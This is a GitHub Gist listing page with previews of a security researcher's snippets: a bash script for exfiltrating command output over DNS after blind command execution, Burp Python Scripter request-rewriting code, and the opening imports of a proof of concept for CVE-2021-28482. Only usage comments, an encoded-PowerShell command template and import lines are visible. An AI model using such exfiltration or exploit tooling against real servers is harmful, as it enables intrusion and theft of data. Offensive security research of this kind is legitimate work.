Skip to content

Instantly share code, notes, and snippets.

View irsdl's full-sized avatar
💭
< ⊙ ͜ʖಠ />

Soroush Dalili irsdl

💭
< ⊙ ͜ʖಠ />
View GitHub Profile
@irsdl
irsdl / dns_data_exfiltration.sh
Created October 13, 2020 09:49
A bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked.
#!/bin/bash
: '
Usage:
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns
Todo:
1. add support for powershell
something like the following should do the trick but haven't tested it:
outer_cmd_template="powershell -enc %CMD_B64%"
@irsdl
irsdl / dns_data_exfiltration.sh
Created October 13, 2020 09:49
A bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked.
#!/bin/bash
: '
Usage:
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns
Todo:
1. add support for powershell
something like the following should do the trick but haven't tested it:
outer_cmd_template="powershell -enc %CMD_B64%"
@irsdl
irsdl / pyscripter_snippets.py
Last active January 5, 2024 05:04 — forked from lanmaster53/pyscripter-snippets.py
Burp Python Scripter scripts
# ***********************************************replacer_for_python_scripter
import re,random
print callbacks.getToolName(toolFlag)
if(messageIsRequest):
if (callbacks.getToolName(toolFlag) == "Proxy" or callbacks.getToolName(toolFlag) == "Intruder" or callbacks.getToolName(toolFlag) == "Repeater"):
requestInfo = helpers.analyzeRequest(messageInfo)
headers = requestInfo.getHeaders()
msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():]
msg = helpers.bytesToString(msgBody)
@irsdl
irsdl / PoC_CVE-2021-28482.py
Created September 7, 2021 21:15 — forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)